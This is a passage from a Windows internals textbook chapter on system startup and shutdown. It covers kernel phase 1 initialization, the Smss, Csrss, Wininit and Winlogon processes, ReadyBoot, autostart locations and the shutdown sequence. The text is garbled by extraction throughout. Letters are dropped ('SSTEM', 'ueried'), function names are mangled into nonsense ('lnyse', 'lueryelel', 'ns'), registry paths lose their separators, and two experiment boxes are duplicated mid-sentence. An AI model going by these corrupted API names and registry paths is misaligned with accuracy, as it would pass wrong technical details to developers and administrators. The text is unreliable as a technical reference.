The NUMA/group topology relationships are created, in which the system tries to come up with
the most optimized mapping between logical processors and processor groups, taking into
account NUMA localities and distances, unless overridden by the relevant BCD settings.
5.
lnyse performs phase 1 of its initialization. It prepares the system to accept interrupts
from external peripherals.
6.
The system clock interrupt is initialized, and the system clock tick generation is enabled.
CHAPTER 12 Startup and shutdown
825
7.
The old boot video driver (bootvid) is initialized. It’s used only for printing debug messages and
messages generated by native applications launched by SMSS, such as the NT chkdsk.
8.
The kernel builds various strings and version information, which are displayed on the boot
screen through Bootvid if the sos boot option was enabled. This includes the full version infor-
mation, number of processors supported, and amount of memory supported.
9.
The power manager’s initialization is called.
10. The system time is initialized (by calling lueryelel) and then stored as the time
the system booted.
11. On a multiprocessor system, the remaining processors are initialized by erllressrs
and HalAllProcessorsStarted. The number of processors that will be initialized and supported
depends on a combination of the actual physical count, the licensing information for the
installed SKU of Windows, boot options such as nupr and bootproc, and whether dynamic
partitioning is enabled (server systems only). After all the available processors have initialized,
the affinity of the system process is updated to include all processors.
12. The object manager initializes the global system silo, the per-processor nonpaged lookaside
lists and descriptors, and base auditing (if enabled by the system control vector). It then cre-
ates the namespace root directory (), KernelObjects directory, ObjectTypes directory, and
the DOS device name mapping directory (Global), with the Global and GLOBALROOT links
created in it. The object manager then creates the silo device map that will control the DOS
device name mapping and attach it to the system process. It creates the old DosDevices sym-
bolic link (maintained for compatibility reasons) that points to the Windows subsystem device
name mapping directory. The object manager finally inserts each registered object type in the
ObjectTypes directory object.
13. The executive is called to create the executive object types, including semaphore, mutex, event,
timer, keyed event, push lock, and thread pool worker.
14. The I/O manager is called to create the I/O manager object types, including device, driver, con-
troller, adapter, I/O completion, wait completion, and file objects.
15. The kernel initializes the system watchdogs. There are two main types of watchdog the DPC
watchdog, which checks that a DPC routine will not execute more than a specified amount of
time, and the CPU Keep Alive watchdog, which verifies that each CPU is always responsive. The
watchdogs aren’t initialized if the system is executed by a hypervisor.
16. The kernel initializes each CPU processor control block (KPRCB) data structure, calculates the
Numa cost array, and finally calculates the System Tick and Quantum duration.
17. The kernel debugger library finalizes the initialization of debugging settings and parameters,
regardless of whether the debugger has not been triggered prior to this point.
18. The transaction manager also creates its object types, such as the enlistment, resource man-
ager, and transaction manager types.
19. The user-mode debugging library (Dbgk) data structures are initialized for the global system silo.
826
CHAPTER 12 Startup and shutdown
20. If driver verifier is enabled and, depending on verification options, pool verification is enabled,
object handle tracing is started for the system process.
21. The security reference monitor creates the Security directory in the object manager namespace,
protecting it with a security descriptor in which only the SYSTEM account has full access, and
initializes auditing data structures if auditing is enabled. Furthermore, the security reference
monitor initializes the kernel-mode SDDL library and creates the event that will be signaled
after the LSA has initialized (SecurityLSAAUTENTICATIONINITIALIED).
Finally, the Security Reference Monitor initializes the Kernel Code Integrity component (Ci.dll)
for the first time by calling the internal nle routine, which initializes all the Code Integrity
Callbacks and saves the list of boot drivers for further auditing and verification.
22. The process manager creates a system handle for the executive system partition. The handle
will never be dereferenced, so as a result the system partition cannot be destroyed. The Process
Manager then initializes the support for kernel optional extension (more details are in step 26).
It registers host callouts for various OS services, like the Background Activity Moderator (BAM),
Desktop Activity Moderator (DAM), Multimedia Class Scheduler Service (MMCSS), Kernel
ardware Tracing, and Windows Defender System Guard.
Finally, if VSM is enabled, it creates the first minimal process, the IUM System Process, and
assigns it the name Secure System.
23. The SystemRoot symbolic link is created.
24. The memory manager is called to perform phase 1 of its initialization. This phase creates the
Section object type, initializes all its associated data structures (like the control area), and
creates the DevicePhysicalMemory section object. It then initializes the kernel Control Flow
Guard support and creates the pagefile-backed sections that will be used to describe the user
mode CFG bitmap(s). (Read more about Control Flow Guard in Chapter 7, Part 1.) The memory
manager initializes the Memory Enclave support (for SGX compatible systems), the hot-patch
support, the page-combining data structures, and the system memory events. Finally, it spawns
three memory manager system worker threads (Balance Set Manager, Process Swapper, and
ero Page Thread, which are explained in Chapter 5 of Part 1) and creates a section object used
to map the API Set schema memory buffer in the system space (which has been previously al-
located by the Windows Loader). The just-created system threads have the chance to execute
later, at the end of phase 1.
25. NLS tables are mapped into system space so that they can be mapped easily by user-mode
processes.
26. The cache manager initializes the file system cache data structures and creates its worker threads.
27. The configuration manager creates the Registry key object in the object manager namespace
and opens the in-memory SSTEM hive as a proper hive file. It then copies the initial hardware
tree data passed by Winload into the volatile ARDWARE hive.
28. The system initializes Kernel Optional Extensions. This functionality has been introduced in
Windows 8.1 with the goal of exporting private system components and Windows loader data
CHAPTER 12 Startup and shutdown
827
(like memory caching reuirements, UEFI runtime services pointers, UEFI memory map, SMBIOS
data, secure boot policies, and Code Integrity data) to different kernel components (like the
Secure Kernel) without using the standard PE (portable executable) exports.
29. The errata manager initializes and scans the registry for errata information, as well as the
INF (driver installation file, described in Chapter 6 of Part 1) database containing errata for
various drivers.
30. The manufacturing-related settings are processed. The manufacturing mode is a special
operating system mode that can be used for manufacturing-related tasks, such as compo-
nents and support testing. This feature is used especially in mobile systems and is provided by
the UEFI subsystem. If the firmware indicates to the OS (through a specific UEFI protocol) that
this special mode is enabled, Windows reads and writes all the needed information from the
KLMSystemCurrentControlSetControlManufacturingMode registry key.
31. Superfetch and the prefetcher are initialized.
32. The Kernel Virtual Store Manager is initialized. The component is part of memory compression.
33. The VM Component is initialized. This component is a kernel optional extension used to com-
municate with the hypervisor.
34. The current time zone information is initialized and set.
35. Global file system driver data structures are initialized.
36. The NT Rtl compression engine is initialized.
37. The support for the hypervisor debugger, if needed, is set up, so that the rest of the system
does not use its own device.
38. Phase 1 of debugger-transport-specific information is performed by calling the
euernle routine in the registered transport, such as Kdcom.dll.
39. The advanced local procedure call (ALPC) subsystem initializes the ALPC port type and ALPC
waitable port type objects. The older LPC objects are set as aliases.
40. If the system was booted with boot logging (with the BCD l option), the boot log file
is initialized. If the system was booted in safe mode, it finds out if an alternate shell must be
launched (as in the case of a safe mode with command prompt boot).
41. The executive is called to execute its second initialization phase, where it configures part of the
Windows licensing functionality in the kernel, such as validating the registry settings that hold
license data. Also, if persistent data from boot applications is present (such as memory diagnos-
tic results or resume from hibernation information), the relevant log files and information are
written to disk or to the registry.
42. The MiniNT/WinPE registry keys are created if this is such a boot, and the NLS object directory
is created in the namespace, which will be used later to host the section objects for the various
memory-mapped NLS files.
828
CHAPTER 12 Startup and shutdown
43. The Windows kernel Code Integrity policies (like the list of trusted signers and certificate
hashes) and debugging options are initialized, and all the related settings are copied from
the Loader Block to the kernel CI module (Ci.dll).
44. The power manager is called to initialize again. This time it sets up support for power requests,
the power watchdogs, the ALPC channel for brightness notifications, and profile callback support.
45. The I/O manager initialization now takes place. This stage is a complex phase of system startup
that accounts for most of the boot time.
The I/O manager first initializes various internal structures and creates the driver and de-
vice object types as well as its root directories Driver, FileSystem, FileSystemFilters, and
UMDFCommunication Ports (for the UMDF driver framework). It then initializes the Kernel
Shim Engine, and calls the Plug and Play manager, power manager, and AL to begin the
various stages of dynamic device enumeration and initialization. (We covered all the details
of this complex and specific process in Chapter 6 of Part 1.) Then the Windows Management
Instrumentation (WMI) subsystem is initialized, which provides WMI support for device drivers.
(See the section “Windows Management Instrumentation” in Chapter 10 for more information.)
This also initializes Event Tracing for Windows (ETW) and writes all the boot persistent data
ETW events, if any.
The I/O manager starts the platform-specific error driver and initializes the global table of
hardware error sources. These two are vital components of the Windows ardware Error
infrastructure. Then it performs the first Secure Kernel call, asking the Secure Kernel to per-
form the last stage of its initialization in VTL 1. Also, the encrypted secure dump driver is
initialized, reading part of its configuration from the Windows Registry (KLMSystem
CurrentControlSet\Control\CrashControl).
All the boot-start drivers are enumerated and ordered while respecting their dependencies and
load-ordering. (Details on the processing of the driver load control information on the registry
are also covered in Chapter 6 of Part 1.) All the linked kernel mode DLLs are initialized with the
built-in RAW file system driver.
At this stage, the I/O manager maps Ntdll.dll, Vertdll.dll, and the WOW64 version of Ntdll into
the system address space. Finally, all the boot-start drivers are called to perform their driver-
specific initialization, and then the system-start device drivers are started. The Windows sub-
system device names are created as symbolic links in the object manager’s namespace.
46. The configuration manager registers and starts its Windows registry’s ETW Trace Logging
Provider. This allows the tracing of the entire configuration manager.
47. The transaction manager sets up the Windows software trace preprocessor (WPP) and registers
its ETW Provider.
48. Now that boot-start and system-start drivers are loaded, the errata manager loads the INF
database with the driver errata and begins parsing it, which includes applying registry PCI
configuration workarounds.
49. If the computer is booting in safe mode, this fact is recorded in the registry.
CHAPTER 12 Startup and shutdown
829
50. Unless explicitly disabled in the registry, paging of kernel-mode code (in Ntoskrnl and drivers)
is enabled.
51. The power manager is called to finalize its initialization.
52. The kernel clock timer support is initialized.
53. Before the INIT section of Ntoskrnl will be discarded, the rest of the licensing information for
the system is copied into a private system section, including the current policy settings that are
stored in the registry. The system expiration time is then set.
54. The process manager is called to set up rate limiting for jobs and the system process creation
time. It initializes the static environment for protected processes, and looks up various system-
defined entry points in the user-mode system libraries previously mapped by the I/O manager
(usually Ntdll.dll, Ntdll32.dll, and Vertdll.dll).
55. The security reference monitor is called to create the Command Server thread that commu-
nicates with LSASS. This phase creates the Reference Monitor command port, used by LSA to
send commands to the SRM. (See the section Security system components in Chapter 7 in Part
1 for more on how security is enforced in Windows.)
56. If the VSM is enabled, the encrypted VSM keys are saved to disk. The system user-mode librar-
ies are mapped into the Secure System Process. In this way, the Secure Kernel receives all the
needed information about the VTL 0’s system DLLs.
57. The Session Manager (Smss) process (introduced in Chapter 2, System architecture, in Part 1)
is started. Smss is responsible for creating the user-mode environment that provides the visible
interface to Windowsits initialization steps are covered in the next section.
58. The bootvid driver is enabled to allow the NT check disk tool to display the output strings.
59. The TPM boot entropy values are ueried. These values can be ueried only once per boot, and
normally, the TPM system driver should have ueried them by now, but if this driver has not
been running for some reason (perhaps the user disabled it), the unueried values would still
be available. Therefore, the kernel also manually ueries them to avoid this situation in normal
scenarios, the kernel’s own query should fail.
60. All the memory used by the loader parameter block and all its references (like the initialization
code of Ntoskrnl and all boot drivers, which reside in the INIT sections) are now freed.
As a final step before considering the executive and kernel initialization complete, the phase 1
initialization thread sets the critical break on termination flag to the new Smss process. In this way, if
the Smss process exits or gets terminated for some reason, the kernel intercepts this, breaks into the
attached debugger (if any), and crashes the system with a O stop code.
If the five-second wait times out (that is, if five seconds elapse), the Session Manager is assumed to
have started successfully, and the phase 1 initialization thread exits. Thus, the boot processor executes
one of the memory manager’s system threads created in step 22 or returns to the Idle loop.
830
CHAPTER 12 Startup and shutdown
Smss, Csrss, and Wininit
Smss is like any other user-mode process except for two differences. First, Windows considers Smss
a trusted part of the operating system. Second, Smss is a ne application. Because it’s a trusted
operating system component, Smss runs as a protected process light (PPL PPLs are covered in Part 1,
Chapter 3, Processes and jobs) and can perform actions few other processes can perform, such as
creating security tokens. Because it’s a native application, Smss doesn’t use Windows APIsit uses
only core executive APIs known collectively as the Windows native API (which are normally exposed by
Ntdll). Smss doesn’t use the Win32 APIs, because the Windows subsystem isn’t executing when Smss
launches. In fact, one of Smss’s first tasks is to start the Windows subsystem.
Smss initialization has been already covered in the Session Manager section of Chapter 2 of Part 1.
For all the initialization details, please refer to that chapter. When the master Smss creates the children
Smss processes, it passes two section objects’ handles as parameters. The two section objects represent
the shared buffers used for exchanging data between multiple Smss and Csrss instances (one is used to
communicate between the parent and the child Smss processes, and the other is used to communicate
with the client subsystem process). The master Smss spawns the child using the lreeserress
routine, specifying a flag to instruct the Process Manager to create a new session. In this case, the
PspAllocateProcess kernel function calls the memory manager to create the new session address space.
The executable name that the child Smss launches at the end of its initialization is stored in the
shared section, and, as stated in Chapter 2, is usually Wininit.exe for session 0 and Winlogon.exe for any
interactive sessions. An important concept to remember is that before the new session 0 Smss launches
Wininit, it connects to the Master Smss (through the SmApiPort ALPC port) and loads and initializes all
the subsystems.
The session manager acuires the Load Driver privilege and asks the kernel to load and map the
Win32k driver into the new Session address space (using the eysenrn native API). It
then launches the client-server subsystem process (Csrss.exe), specifying in the command line the fol-
lowing information the root Windows Object directory name (Windows), the shared section objects’
handles, the subsystem name (Windows), and the subsystem’s DLLs
I
Basesrv.dll The server side of the subsystem process
I
Sxssrv.dll The side-by-side subsystem support extension module
I
Winsrv.dll The multiuser subsystem support module
The client–server subsystem process performs some initialization It enables some process mitigation
options, removes unneeded privileges from its token, starts its own ETW provider, and initializes a linked
list of O data structures to trace all the Win32 processes that will be started in the system. It
then parses its command line, grabs the shared sections’ handles, and creates two ALPC ports
I
CSR API command port (SessionsIDWindowsApiPort) This ALPC Port will be used by
every Win32 process to communicate with the Csrss subsystem. (Kernelbase.dll connects to it in
its initialization routine.)
CHAPTER 12 Startup and shutdown
831
I
Susystem Session anager A ort (SessionsIDWindowsSbApiPort) This port is
used by the session manager to send commands to Csrss.
Csrss creates the two threads used to dispatch the commands received by the ALPC ports. Finally,
it connects to the Session Manager, through another ALPC port (SmApiPort), which was previously
created in the Smss initialization process (step 6 of the initialization procedure described in Chapter 2).
In the connection process, the Csrss process sends the name of the just-created Session Manager API
port. From now on, new interactive sessions can be started. So, the main Csrss thread finally exits.
After spawning the subsystem process, the child Smss launches the initial process (Wininit or
Winlogon) and then exits. Only the master instance of Smss remains active. The main thread in Smss
waits forever on the process handle of Csrss, whereas the other ALPC threads wait for messages to
create new sessions or subsystems. If either Wininit or Csrss terminate unexpectedly, the kernel crashes
the system because these processes are marked as critical. If Winlogon terminates unexpectedly, the
session associated with it is logged off.
Pending file rename operations
The fact that executable images and DLLs are memory-mapped when they’re used makes it impos-
sible to update core system files after Windows has finished booting (unless hotpatching technolo-
gy is used, but that’s only for Microsoft patches to the operating system). The ele Windows
API has an option to specify that a file move be delayed until the next boot. Service packs and
hotfixes that must update in-use memory-mapped files install replacement files onto a system in
temporary locations and use the ele API to have them replace otherwise in-use files. When
used with that option, ele simply records commands in the ennleeneOperns
and ennleeneOperns keys under KLMSSTEMCurrentControlSetControlSession
Manager. These registry values are of type , where each operation is specified in pairs of
file names The first file name is the source location, and the second is the target location. Delete
operations use an empty string as their target path. ou can use the Pendmoves utility from
Windows Sysinternals (ps//srs/enus/sysnernls/) to view registered delayed
rename and delete commands.
Wininit performs its startup steps, as described in the “Windows initialization process” section of
Chapter 2 in Part 1, such as creating the initial window station and desktop objects. It also sets up the
user environment, starts the Shutdown RPC server and WSI interface (see the Shutdown section later
in this chapter for further details), and creates the service control manager (SCM) process (Services.exe),
which loads all services and device drivers marked for auto-start. The local session manager (Lsm.dll)
service, which runs in a shared Svchost process, is launched at this time. Wininit next checks whether
there has been a previous system crash, and, if so, it carves the crash dump and starts the Windows
Error Reporting process (werfault.exe) for further processing. It finally starts the Local Security
Authentication Subsystem Service (SystemRootSystem32Lsass.exe) and, if Credential Guard is
enabled, the Isolated LSA Trustlet (Lsaiso.exe) and waits forever for a system shutdown reuest.
832
CHAPTER 12 Startup and shutdown
On session 1 and beyond, Winlogon runs instead. While Wininit creates the noninteractive session 0
windows station, Winlogon creates the default interactive-session Windows station, called WinSta0,
and two desktops the Winlogon secure desktop and the default user desktop. Winlogon then ueries
the system boot information using the ueryysenrn API (only on the first interactive
logon session). If the boot configuration includes the volatile Os Selection menu flag, it starts the GDI
system (spawning a UMDF host process, fontdrvhost.exe) and launches the modern boot menu appli-
cation (Bootim.exe). The volatile Os Selection menu flag is set in early boot stages by the Bootmgr only
if a multiboot environment was previously detected (for more details see the section The boot menu
earlier in this chapter).
Bootim is the GUI application that draws the modern boot menu. The new modern boot uses the
Win32 subsystem (graphics driver and GDI calls) with the goal of supporting high resolutions for
displaying boot choices and advanced options. Even touchscreens are supported, so the user can select
which operating system to launch using a simple touch. Winlogon spawns the new Bootim process
and waits for its termination. When the user makes a selection, Bootim exits. Winlogon checks the exit
code thus it’s able to detect whether the user has selected an OS or a boot tool or has simply re-
quested a system shutdown. If the user has selected an OS different from the current one, Bootim adds
the sequene one-shot BCD option in the main system boot store (see the section The Windows
Boot Manager earlier in this chapter for more details about the BCD store). The new boot seuence is
recognized (and the BCD option deleted) by the Windows Boot Manager after Winlogon has restarted
the machine using NtShutdownSystem API. Winlogon marks the previous boot entry as good before
restarting the system.
EXPERIMENT: Playing with the modern boot menu
The modern boot menu application, spawned by Winlogon after Csrss is started, is really a clas-
sical Win32 GUI application. This experiment demonstrates it. In this case, it’s better if you start
with a properly configured multiboot system otherwise, you won’t be able to see the multiple
entries in the Modern boot menu.
Open a non-elevated console window (by typing cmd in the Start menu search box) and go
to the WindowsSystem32 path of the boot volume by typing cd /d C:\Windows\System32
(where C is the letter of your boot volume). Then type Bootim.exe and press Enter. A screen
similar to the modern boot menu should appear, showing only the Turn Off Your Computer op-
tion. This is because the Bootim process has been started under the standard non-administrative
token (the one generated for User Account Control). Indeed, the process isn’t able to access the
system boot configuration data. Press CtrlAltDel to start the Task Manager and terminate the
BootIm process, or simply select Turn Off Your Computer. The actual shutdown process is start-
ed by the caller process (which is Winlogon in the original boot sequence) and not by BootIm.
EXPERIMENT: Playing with the modern boot menu
The modern boot menu application, spawned by Winlogon after Csrss is started, is really a clas-
sical Win32 GUI application. This experiment demonstrates it. In this case, it’s better if you start
with a properly configured multiboot system otherwise, you won’t be able to see the multiple
entries in the Modern boot menu.
Open a non-elevated console window (by typing cmd in the Start menu search box) and go
to the WindowsSystem32 path of the boot volume by typing cd /d C:\Windows\System32
(where C is the letter of your boot volume). Then type Bootim.exe and press Enter. A screen
similar to the modern boot menu should appear, showing only the Turn Off Your Computer op-
tion. This is because the Bootim process has been started under the standard non-administrative
token (the one generated for User Account Control). Indeed, the process isn’t able to access the
system boot configuration data. Press CtrlAltDel to start the Task Manager and terminate the
BootIm process, or simply select Turn Off Your Computer. The actual shutdown process is start-
ed by the caller process (which is Winlogon in the original boot sequence) and not by BootIm.
CHAPTER 12 Startup and shutdown
833
Now you should run the Command Prompt window with an administrative token by right-
clicking its taskbar icon or the Command Prompt item in the Windows search box and selecting
Run As Administrator. In the new administrative prompt, start the BootIm executable. This time
you will see the real modern boot menu, compiled with all the boot options and tools, similar to
the one shown in the following picture
In all other cases, Winlogon waits for the initialization of the LSASS process and LSM service. It
then spawns a new instance of the DWM process (Desktop Windows Manager, a component used to
draw the modern graphical interface) and loads the registered credential providers for the system (by
default, the Microsoft credential provider supports password-based, pin-based, and biometrics-based
logons) into a child process called LogonUI (SystemRootSystem32Logonui.exe), which is responsi-
ble for displaying the logon interface. (For more details on the startup sequence for Wininit, Winlogon,
and LSASS, see the section “Winlogon initialization” in Chapter 7 in Part 1.)
After launching the LogonUI process, Winlogon starts its internal finite-state machine. This is used
to manage all the possible states generated by the different logon types, like the standard interactive
logon, terminal server, fast user switch, and hiberboot. In standard interactive logon types, Winlogon
shows a welcome screen and waits for an interactive logon notification from the credential provider
(configuring the SAS seuence if needed). When the user has inserted their credential (that can be a
password, PIN, or biometric information), Winlogon creates a logon session LUID, and validates the
logon using the authentication packages registered in Lsass (a process for which you can find more
Now you should run the Command Prompt window with an administrative token by right-
clicking its taskbar icon or the Command Prompt item in the Windows search box and selecting
Run As Administrator. In the new administrative prompt, start the BootIm executable. This time
you will see the real modern boot menu, compiled with all the boot options and tools, similar to
the one shown in the following picture
834
CHAPTER 12 Startup and shutdown
information in the section User logon steps in Chapter 7 in Part 1). Even if the authentication won’t
succeed, Winlogon at this stage marks the current boot as good. If the authentication succeeded,
Winlogon verifies the seuential logon scenario in case of client SKUs, in which only one session each
time could be generated, and, if this is not the case and another session is active, asks the user how to
proceed. It then loads the registry hive from the profile of the user logging on, mapping it to KCU. It
adds the reuired ACLs to the new session’s Windows Station and Desktop and creates the user’s envi-
ronment variables that are stored in KCUEnvironment.
Winlogon next waits the Sihost process and starts the shell by launching the executable or executables
specified in KLMSOFTWAREMicrosoftWindows NTCurrentVersionWinLogonUserinit (with multiple
executables separated by commas) that by default points at WindowsSystem32Userinit.exe. The new
Userinit process will live in Winsta0Default desktop. Userinit.exe performs the following steps
1.
Creates the per-session volatile Explorer Session key KCUSoftwareMicrosoftWindows
CurrentVersion\Explorer\SessionInfo\.
2.
Processes the user scripts specified in KCUSoftwarePoliciesMicrosoftWindowsSystem
Scripts and the machine logon scripts in KLMSOFTWAREPoliciesMicrosoftWindows
SystemScripts. (Because machine scripts run after user scripts, they can override user settings.)
3.
Launches the comma-separated shell or shells specified in KCUSoftwareMicrosoftWindows
NTCurrentVersionWinlogonShell. If that value doesn’t exist, Userinit.exe launches the shell or
shells specified in KLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogonShell,
which is by default Explorer.exe.
4.
If Group Policy specifies a user profile uota, starts SystemRootSystem32Prouota.exe to
enforce the quota for the current user.
Winlogon then notifies registered network providers that a user has logged on, starting the mpno-
tify.exe process. The Microsoft network provider, Multiple Provider Router (SystemRootSystem32
Mpr.dll), restores the user’s persistent drive letter and printer mappings stored in KCUNetwork and
KCUPrinters, respectively. Figure 12-11 shows the process tree as seen in Process Monitor after a
logon (using its boot logging capability). Note the Smss processes that are dimmed (meaning that they
have since exited). These refer to the spawned copies that initialize each session.
CHAPTER 12 Startup and shutdown
835
FIGURE 12-11 Process tree during logon.
ReadyBoot
Windows uses the standard logical boot-time prefetcher (described in Chapter 5 of Part 1) if the system
has less than 400 MB of free memory, but if the system has 400 MB or more of free RAM, it uses an in-
RAM cache to optimize the boot process. The size of the cache depends on the total RAM available, but
it’s large enough to create a reasonable cache and yet allow the system the memory it needs to boot
smoothly. ReadyBoot is implemented in two distinct binaries the ReadyBoost driver (Rdyboost.sys) and
the Sysmain service (Sysmain.dll, which also implements SuperFetch).
The cache is implemented by the Store Manager in the same device driver that implements
ReadyBoost caching (Rdyboost.sys), but the cache’s population is guided by the boot plan previously
stored in the registry. Although the boot cache could be compressed like the ReadyBoost cache, an-
other difference between ReadyBoost and ReadyBoot cache management is that while in ReadyBoot
mode, the cache is not encrypted. The ReadyBoost service deletes the cache 50 seconds after the
service starts, or if other memory demands warrant it.
836
CHAPTER 12 Startup and shutdown
When the system boots, at phase 1 of the NT kernel initialization, the ReadyBoost driver, which is
a volume filter driver, intercepts the boot volume creation and decides whether to enable the cache.
The cache is enabled only if the target volume is registered in the KLMSystemCurrentControlSet
ServicesrdyboostParametersReadyBootVolumeUniueId registry value. This value contains the ID of
the boot volume. If ReadyBoot is enabled, the ReadyBoost driver starts to log all the volume boot I/Os
(through ETW), and, if a previous boot plan is registered in the BootPlan registry binary value, it spawns
a system thread that will populate the entire cache using asynchronous volume reads. When a new
Windows OS is installed, at the first system boot these two registry values do not exist, so neither the
cache nor the log trace are enabled.
In this situation the Sysmain service, which is started later in the boot process by the SCM, deter-
mines whether the cache needs to be enabled, checking the system configuration and the running
Windows SKU. There are situations in which ReadyBoot is completely disabled, such as when the boot
disk is a solid state drive. If the check yields a positive result, Sysmain enables ReadyBoot by writing the
boot volume ID on the relative registry value (eyluenque) and by enabling the WMI
ReadyBoot Autologger in the KLMSSTEMCurrentControlSetControlWMIAutoLoggerReadyboot
registry key. At the next system boot, the ReadyBoost driver logs all the Volume I/Os but without popu-
lating the cache (still no boot plan exists).
After every successive boot, the Sysmain service uses idle CPU time to calculate a boot-time caching
plan for the next boot. It analyzes the recorded ETW I/O events and identifies which files were accessed and
where they’re located on disk. It then stores the processed traces in SystemRootPrefetchReadyboot as
.fx files and calculates the new caching boot plan using the trace files of the five previous boots. The Sysmain
service stores the new generated plan under the registry value, as shown in Figure 12-12. The ReadyBoost
boot driver reads the boot plan and populates the cache, minimizing the overall boot startup time.
FIGURE 12-12 ReadyBoot configuration and statistics.
CHAPTER 12 Startup and shutdown
837
Images that start automatically
In addition to the Userinit and Shell registry values in Winlogon’s key, there are many other registry lo-
cations and directories that default system components check and process for automatic process start-
up during the boot and logon processes. The Msconfig utility (SystemRootSystem32Msconfig.exe)
displays the images configured by several of the locations. The Autoruns tool, which you can download
from Sysinternals and is shown in Figure 12-13, examines more locations than Msconfig and displays
more information about the images configured to automatically run. By default, Autoruns shows only
the locations that are configured to automatically execute at least one image, but selecting the Include
Empty Locations entry on the Options menu causes Autoruns to show all the locations it inspects.
The Options menu also has selections to direct Autoruns to hide Microsoft entries, but you should
always combine this option with eriy mage Signatures otherwise, you risk hiding malicious pro-
grams that include false information about their company name information.
FIGURE 12-13 The Autoruns tool available from Sysinternals.
Shutdown
The system shutdown process involves different components. Wininit, after having performed all its
initialization, waits for a system shutdown.
If someone is logged on and a process initiates a shutdown by calling the Windows ns
function, a message is sent to that session’s Csrss instructing it to perform the shutdown. Csrss in turn
impersonates the caller and sends an RPC message to Winlogon, telling it to perform a system shut-
down. Winlogon checks whether the system is in the middle of a hybrid boot transition (for further
details about hybrid boot, see the ybernation and Fast Startup section later in this chapter), then
impersonates the currently logged-on user (who might or might not have the same security context as
838
CHAPTER 12 Startup and shutdown
the user who initiated the system shutdown), asks LogonUI to fade out the screen (configurable
through the registry value KLMSoftwareMicrosoftWindows NCurrentVersionWinlogon
FadePeriodConfiguration), and calls ns with special internal flags. Again, this call causes a
message to be sent to the Csrss process inside that session, requesting a system shutdown.
This time, Csrss sees that the request is from Winlogon and loops through all the processes in the
logon session of the interactive user (again, not the user who reuested a shutdown) in reverse order
of their sunleel. A process can specify a shutdown level, which indicates to the system when it
wants to exit with respect to other processes, by calling eressunreers. Valid shut-
down levels are in the range 0 through 1023, and the default level is 640. Explorer, for example, sets
its shutdown level to 2, and Task Manager specifies 1. For each active process that owns a top-level
window, Csrss sends the O message to each thread in the process that has
a Windows message loop. If the thread returns TRUE, the system shutdown can proceed. Csrss then
sends the O Windows message to the thread to request it to exit. Csrss waits the num-
ber of seconds defined in KCUControl PanelDesktopungAppTimeout for the thread to exit. (The
default is 5000 milliseconds.)
If the thread doesn’t exit before the timeout, Csrss fades out the screen and displays the hung-
program screen shown in Figure 12-14. (ou can disable this screen by creating the registry value KCU
Control PanelDesktopAutoEndTasks and setting it to 1.) This screen indicates which programs are
currently running and, if available, their current state. Windows indicates which program isn’t shut-
ting down in a timely manner and gives the user a choice of either killing the process or aborting the
shutdown. (There is no timeout on this screen, which means that a shutdown reuest could wait forever
at this point.) Additionally, third-party applications can add their own specific information regarding
statefor example, a virtualization product could display the number of actively running virtual ma-
chines (using the unlesnree API).
FIGURE 12-14 ung-program screen.
CHAPTER 12 Startup and shutdown
839
EXPERIMENT: Witnessing the HungAppTimeout
ou can see the use of the ungAppTimeout registry value by running Notepad, entering text
into its editor, and then logging off. After the amount of time specified by the ungAppTimeout
registry value has expired, Csrss.exe presents a prompt that asks you whether you want to end
the Notepad process, which has not exited because it’s waiting for you to tell it whether to save
the entered text to a file. If you select Cancel, Csrss.exe aborts the shutdown.
As a second experiment, if you try shutting down again (with Notepad’s query dialog box still
open), Notepad displays its own message box to inform you that shutdown cannot cleanly proceed.
owever, this dialog box is merely an informational message to help usersCsrss.exe will still con-
sider that Notepad is hung and display the user interface to terminate unresponsive processes.
If the thread does exit before the timeout, Csrss continues sending the O/
O message pairs to the other threads in the process that own windows. Once all the
threads that own windows in the process have exited, Csrss terminates the process and goes on to the
next process in the interactive session.
If Csrss finds a console application, it invokes the console control handler by sending the
OO event. (Only service processes receive the O event on
shutdown.) If the handler returns , Csrss kills the process. If the handler returns or doesn’t
respond by the number of seconds defined by KCUControl PanelDesktopWaitToKillTimeout (the
default is 5,000 milliseconds), Csrss displays the hung-program screen shown in Figure 12-14.
Next, the Winlogon state machine calls ns to have Csrss terminate any COM processes
that are part of the interactive user’s session.
At this point, all the processes in the interactive user’s session have been terminated. Wininit next
calls ns, which this time executes within the system process context. This causes Wininit
to send a message to the Csrss part of session 0, where the services live. Csrss then looks at all the pro-
cesses belonging to the system context and performs and sends the O/
O messages to GUI threads (as before). Instead of sending OO,
however, it sends O to console applications that have registered control
handlers. Note that the SCM is a console program that registers a control handler. When it receives the
shutdown reuest, it in turn sends the service shutdown control message to all services that registered
EXPERIMENT: Witnessing the HungAppTimeout
ou can see the use of the ungAppTimeout registry value by running Notepad, entering text
into its editor, and then logging off. After the amount of time specified by the ungAppTimeout
registry value has expired, Csrss.exe presents a prompt that asks you whether you want to end
the Notepad process, which has not exited because it’s waiting for you to tell it whether to save
the entered text to a file. If you select Cancel, Csrss.exe aborts the shutdown.
As a second experiment, if you try shutting down again (with Notepad’s query dialog box still
open), Notepad displays its own message box to inform you that shutdown cannot cleanly proceed.
owever, this dialog box is merely an informational message to help usersCsrss.exe will still con-
sider that Notepad is hung and display the user interface to terminate unresponsive processes.
840
CHAPTER 12 Startup and shutdown
for shutdown notification. For more details on service shutdown (such as the shutdown timeout Csrss
uses for the SCM), see the Services section in Chapter 10.
Although Csrss performs the same timeouts as when it was terminating the user processes, it
doesn’t display any dialog boxes and doesn’t kill any processes. (The registry values for the system pro-
cess timeouts are taken from the default user profile.) These timeouts simply allow system processes
a chance to clean up and exit before the system shuts down. Therefore, many system processes are in
fact still running when the system shuts down, such as Smss, Wininit, Services, and LSASS.
Once Csrss has finished its pass notifying system processes that the system is shutting down,
Wininit wakes up, waits 60 seconds for all sessions to be destroyed, and then, if needed, invokes System
Restore (at this stage no user process is active in the system, so the restore application can process all
the needed files that may have been in use before). Wininit finishes the shutdown process by shutting
down LogonUi and calling the executive subsystem function unyse. This function calls the
function eyseere to orchestrate the shutdown of drivers and the rest of the executive
subsystems (Plug and Play manager, power manager, executive, I/O manager, configuration manager,
and memory manager).
For example, eyseere calls the I/O manager to send shutdown I/O packets to all
device drivers that have reuested shutdown notification. This action gives device drivers a chance to
perform any special processing their device might reuire before Windows exits. The stacks of worker
threads are swapped in, the configuration manager flushes any modified registry data to disk, and the
memory manager writes all modified pages containing file data back to their respective files. If the
option to clear the paging file at shutdown is enabled, the memory manager clears the paging file at
this time. The I/O manager is called a second time to inform the file system drivers that the system is
shutting down. System shutdown ends in the power manager. The action the power manager takes
